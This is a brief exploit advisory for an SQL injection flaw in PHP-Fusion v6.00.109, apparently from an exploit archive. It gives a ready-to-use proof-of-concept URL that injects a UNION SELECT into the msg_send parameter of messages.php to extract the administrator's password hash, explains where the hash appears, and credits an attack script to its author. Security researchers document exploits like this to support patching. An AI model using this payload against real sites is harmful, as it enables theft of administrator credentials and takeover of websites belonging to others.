PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure site: http://www.php-fusion.co.uk - if magic_quotes off -> SQL Injection, poc: http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/* now hash is showed in "To:" field when you post a private message this is the tool:
Php-Fusion v6. 00.109 SQL Injection / admin|user credentials disclosure
a script by rgod at http://rgod.altervista.org